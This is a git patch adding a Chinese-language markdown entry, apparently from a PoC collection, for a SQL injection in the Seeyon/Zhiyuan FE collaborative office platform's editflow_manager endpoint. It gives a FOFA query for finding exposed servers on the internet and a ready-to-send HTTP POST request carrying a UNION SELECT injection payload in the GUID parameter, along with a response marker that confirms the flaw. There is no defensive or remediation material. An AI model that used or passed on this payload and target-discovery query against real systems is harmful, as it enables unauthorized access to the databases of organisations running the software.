From 742b1508178d9b66511140b36b09caed12b885da Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 23 Dec 2023 18:19:07 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E8=87=B4=E8=BF=9C=E4=BA=92=E8=81=94FE?= =?UTF-8?q?=E5=8D=8F=E4=BD=9C=E5=8A=9E=E5=85=AC=E5=B9=B3=E5=8F=B0editflow?= =?UTF-8?q?=5Fmanager=E5=AD=98=E5=9C=A8sql=E6=B3=A8=E5=85=A5=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...协作办公平台editflow_manager存在sql注入漏洞.md | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 致远互联FE协作办公平台editflow_manager存在sql注入漏洞.md diff --git a/致远互联FE协作办公平台editflow_manager存在sql注入漏洞.md b/致远互联FE协作办公平台editflow_manager存在sql注入漏洞.md new file mode 100644 index 0000000..5e18e32 --- /dev/null +++ b/致远互联FE协作办公平台editflow_manager存在sql注入漏洞.md @@ -0,0 +1,22 @@ +## 致远互联FE协作办公平台editflow_manager存在sql注入漏洞 + +## fofa +``` +title="FE协作办公平台" || body="li_plugins_download" +``` + + +## poc +``` +POST /sysform/003/editflow_manager.js%70 HTTP/1.1 +Host: x.x.x.x +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Connection: close +Content-Length: 41 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip + +option=2&GUID=-1'+union+select+111*222--+ +``` +响应结果中包含24642证明存在漏洞 +